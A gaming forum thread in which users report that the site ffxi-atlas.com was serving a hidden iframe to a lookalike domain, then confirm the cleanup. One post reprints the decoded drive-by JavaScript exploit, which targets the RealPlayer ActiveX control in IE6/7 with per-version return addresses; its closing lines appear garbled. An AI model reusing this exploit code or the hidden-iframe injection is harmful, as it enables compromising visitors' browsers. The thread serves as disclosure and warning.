Ffxi-atlas.com WAS infected...fixed now.

[ramp]

I apologize for posting this in the 2 hacked threads and in a new topic, but I can't find this reported anywhere else yet.

Avoid ffxi-atlas.com , it has a similar iframe exploit as somepage.com used to have.

(Iframe at the bottom right under the little affliate banners , little black box)

Points to:

" <iframe src="http://www.playonlnie.com/indxe.html" height="0" width="0"></iframe> "
Which contains the malicious javascript code.
A member in my ls got a message from his browser (ie7) that ffxi-atlas required real player to properly display the page, which made me suspicious about it.

http://ao.legionhq.org/atlas.jpg

[Khamsin]

2007 called, they want their exploit back.

[Zosi]

Confirmed. It's encoded differently, not sure if it's the same exploit as before, but NoScript detects and stops it.

[Tajin]

So, is there a way to fix this? Server side, something like learn to CSS, or learn2php

[Raineer]

Creative use of misspellings to fool people into allowing into NoScript.

>< wtf is up with all these sites

edit: So is it in the doodleshop ad instead of the main page? Frame layout makes it look so, just curious who else to be mad at.

[The_OG_Nelta]

inb4zomgBGisgoingtogetinfected

[ramp]

Just finished talking with GM. Took abit of explaining of why he could not view it in internet explorer, where it was, source code and so on, but he (or she) will report it to the appropriate department.

[Sonomaa]

inb4zomgBGisgoingtogetinfected

unlikely, you have my personal promise that I will shut the server down and make you watch happycat for hours until it gets fixed, the hole closed, the firewall retooled, and whoever did it on the fast track to mass DDoS land.

[Stromgarde]

Is this still the IE/Realplayer exploit that Vista is immune to?

[orson]

inb4zomgBGisgoingtogetinfected

unlikely, you have my personal promise that I will shut the server down and make you watch happycat for hours until it gets fixed, the hole closed, the firewall retooled, and whoever did it on the fast track to mass DDoS land.

Why am I almost praying that the GSers try it here now.

[evilpaul]

If you don't have lolRealPlayer installed, and have all your WindowsUpdates, can this even affect you?

Also, wth is this:
http://img211.imageshack.us/img211/6...wtf2rl5.th.png
It happened yesterday and I forgot to post it.

[BRP]

Someone had an avatar from ffxionline.com(a forum) that was going through maint.

[zue]

Do those little black boxes always mean shit is up? I feel like I see them everywhere. Then again my mac gets about as much action as an old dried up republican at a rest stop. orz

[Zosi]

Do those little black boxes always mean shit is up? I feel like I see them everywhere. Then again my mac gets about as much action as an old dried up republican at a rest stop. orz

They have "legitimate" uses, but they're frequently used for this kind of thing. All it means is that an external HTML page is pulled into the current page and displayed in a tiny box, if the HTML page does something that you don't need to see, then they might choose to put it in a tiny (1px by 1px) box like that.

[Tobatobu]

I tried to find it and couldn't locate it with Firefox No-script. Has it already been fixed?

[Stromgarde]

The box is missing from my screen as well.

[Shini]

It looks to be gone already.

[Semitry]

Yes, it was removed asap along the backdoor php code in one of Atlas's pages. Thanks for catching it quickly Ramp.

Looks like they're using the Real Audio exploit and ActiveX. Watch out where you visit with IE and have your activeX security set to maximum.

The decoded the javascript comes to

Code:

<!-- ScRIpT language=jAvAsCrIpT>
kxmz="Gd"
ldzi="dp"
hjlo="cP"
wyad="DG"
mjhb="xf"
qjyf="up"
gomv="pP"
esih="PC"
vahe="sl"
bwaj="Pe"
qptw="pu"
lupe="Pe"
gmsq="CE"
qaxo="WE"
jsps="pO"
qerd="OU"
upyd="fQ"
mmsr="ph"
pjqp="kM"
yfss="Lu"
umso="pE"
xeqx="SO"
thrb="ou"
xies="Vp"
ulaz="XO"
pggs="oU"
nluv="Fp"
glqf="lE"
ocbv="Qu"
ichu="Fh"
vcix="kG"
ymzo="EC"
eigs="LX"
hkub="kw"
vqwo="TR"
guki="nw"
xein="xp"
vczs="sO"
yxfg="Ee"
qwhg="fH"
jafj="Kg"
nhlf="VR"
xtmv="pP"
wngm="SO"
hmfq="ec"
hkxf="Cl"
pmaf="yd"
yufh="Yd"
tjry="qz"
edks="MP"
enjr="sl"
ayig="eC"
ctie="sM"
pjfw="kp"
cqjs="ok"
roye="NQ"
ubem="pC"
egvc="JM"
btcd="fg"
qite="tP"
svkg="xL"
sfad="AL"
ydxw="Kp"
vkqm="MP"
wxlb="cm"
kywx="ZT"
ygjf="PN"
nzst="Ko"
olbv="qc"
ngop="Ka"
muir="OG"
gqkt="eN"
itdq="WE"
tkqr="NX"
fswz="kU"
sdjo="NB"
akxy="TP"
xuxu="CM"
cige="mf"
wnll="VX"
rhwh="KP"
dajx="Ld"
iael="Kx"
acvb="ku"
omrq="Nq"
vbhf="LP"
hokj="Sm"
pjxe="MX"
giib="kP"
naed="Dh"
qwzq="KP"
jdiw="cl"
omzz="ej"
civk="KE"
jgii="ne"
ikyl="yL"
msdy="sN"
trfx="XE"
pczp="GO"
snyl="OO"
jdmy="OO"
syrx="oh"
ufub="nT"
zzst="NP"
tdza="nN"
shqt="Ll"
pmuj="aW"
xpwj="iN"
mgwo="uK"
odzf="xY"
yfjp="Ho"
ljir="nX"
nkog="Zp"
jdqf="Ng"
aucy="nM"
woge="hn"
gqty="Rg"
nfxy="sc"
gaty="VQ"
quas="jb"
diks="Og"
pniu="pF"
iumj="xW"
nthi="dw"
baua="Tg"
nlqn="PS"
dkqf="jr"
loxk="OB"
bqhl="Og"
irwb="GW"
whss="wg"
tlbl="wr"
kgrx="Nw"
lcho="Pv"
yepj="LV"
vzdh="Qw"
qevl="IV"
lxln="OV"
bbjy="nF"
mxuz="lf"
pbao="nF"
fmbo="Iv"
cdil="ER"
qhww="nf"
irru="cv"
wner="Ov"
iwcd="MB"
pkpn="oW"
cfnb="pF"
swbb="aw"
bamn="Dv"
uvhs="SF"
mynm="hb"
ltgd="ov"
bnpi="lf"
agqo="Qw"
hnvk="Cg"
xnmp="Du"
eqto="OG"
fvnj="pF"
otyn="ag"
exuj="Tf"
runn="sF"
rscr="xr"
puor="oG"
qtmq="Pf"
xstq="aW"
uoti="tV"
yxrz="cV"
xgax="xR"
olmt="Nv"
kccj="Eg"
ktkw="hv"
wvev="EP"
pddu="P"
djsw="TY"
psqq="XX"
atdr="XX"
qwbe="fi"
obom="Aq"
fodb="cY"
xpxh="fP"
wufy="AA"
njlo="ei"
sugg="Ao"
stps="HF"
zgpo="XZ"
jzfq="Pi"
pzic="Ak"
aoed="jb"
ojuj="rI"
uwxl="Pi"
oxbp="Ag"
ppvv="Vb"
lpmd="aa"
thwz="Pi"
qohc="Ac"
mtzn="kw"
touu="zO"
krrn="PL"
bhee="iA"
zbka="sl"
xexm="oU"
dtfn="WP"
hpdp="iA"
ryan="Zc"
lpjr="za"
somv="bP"
chun="iA"
iybi="Vq"
ghyc="Kp"
zfwi="AP"
ljbe="iA"
axyd="RC"
lwrq="pD"
ehyj="XP"
pdbd="Ql"
azku="aa"
kfvn="Tb"
rlnl="aa"
adfg="aL"
ymkk="tU"
towd="AA"
drsg="AA"
mdep="CF"
nzdk="ia"
igqg="aP"
ofvv="oH"
yftm="Hm"
ukaj="Da"
fzdu="hi"
cmlk="va"
qofl="bo"
dtvg="wa"
vqqw="bX"
dhlo="kn"
bvwh="EN"
blnc="Ij"
tkpa="dp"
jnvz="PP"
zsjd="PP"
jbfh="pU"
wrwx="ov"
slzr="dz"
ihqh="As"
ckmn="Pp"
hdll="PP"
knnx="pP"
jwuh="Ph"
oqyq="kt"
jrow="pp"
umee="lX"
qxhz="Kw"
hcpu="pq"
sluo="lz"
phcg="mh"
ugrj="KV"
diqh="HP"
ewwh="xX"
seqc="Ko"
wyxw="Gf"
cfnv="ZP"
yqux="tu"
iqib="YN"
cfdy="hD"
mwzh="tp"
hpxr="pP"
xian="pP"
zrtn="pN"
wqyt="Bo"
vyqa="Yf"
bhui="Xf"
faio="of"
bcqq="NP"
ncvq="PP"
uszl="pF"
vjwl="hG"
bcmn="Eg"
jrmk="Bv"
ebed="LF"
ayls="me"
gsfj="tO"
vqvp="oa"
sbew="fX"
ihme="KN"
cjuf="xn"
kclq="hB"
csdl="nP"
mgpy="pP"
kokn="pP"
cnce="PH"
efhw="Cn"
lutg="LR"
hgnw="PX"
xntf="Km"
ebhj="lV"
lgzt="Jr"
alwd="pu"
farx="co"
nyyl="Oe"
zcug="fP"
dmjm="Dl"
rfmr="gp"
wwix="tp"
vett="SU"
lbfg="lV"
dlvf="qR"
davr="NV"
yntp="eL"
mfpz="PR"
acqc="OD"
eqka="UC"
xdzj="TV"
bnry="ER"
qycq="SI"
rrqh="ON"
kk();
function kk()
{
   var user = navigator.userAgent.toLowerCase();
   if(user.indexOf("nt 5.")==-1)
      return;
   if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
      return;

   try
   {
      Real = new ActiveXObject("IER" + "PCtl.I" + "ERP" + "Ctl.1");
   }catch(error)
   {
      return;
   }
   werq = Real.PlayerProperty(mfpz+acqc+eqka+xdzj+bnry+qycq+rrqh);
   sfsdf = "";
   jiji = unescape("%75%06%74%04");
   for(i=0;i<32*148;i++)
      sfsdf += "S";

   
   if(werq.indexOf("6.0.14.") == -1)
   {
      if(navigator.userLanguage.toLowerCase() == "zh-cn")
         ret = unescape("%7f%a5%60");
      else if(navigator.userLanguage.toLowerCase() == "en-us")
         ret = unescape("%4f%71%a4%60");
      else
         return;
   }
   else if(werq == "6.0.14.544")
      ret = unescape("%63%11%08%60");
   else if(werq == "6.0.14.550")
      ret = unescape("%63%11%04%60");
   else if(werq == "6.0.14.552")
      ret = unescape("%79%31%01%60");
   else if(werq == "6.0.14.543")
      ret = unescape("%79%31%09%60");
   else if(werq == "6.0.14.536")
      ret = unescape("%51%11%70%63");
   else
      return;

   \"c:\\Program Files\\";
   iusd  = "NetMeeting\\TestSnd";
   Real.Imporkswdf +iusd + ".wav", gogo,"", 0, 0);
}

</sCrIpT>

[TeancumMemsochet]

inb4zomgBGisgoingtogetinfected

unlikely, you have my personal promise that I will shut the server down and make you watch happycat for hours until it gets fixed, the hole closed, the firewall retooled, and whoever did it on the fast track to mass DDoS land.

Why am I almost praying that the GSers try it here now.

So am I. I would love to watch them get their asses beat by the collective FFXI community.

[SassiAsura]

Writing script tag in alternating caps, what a douche.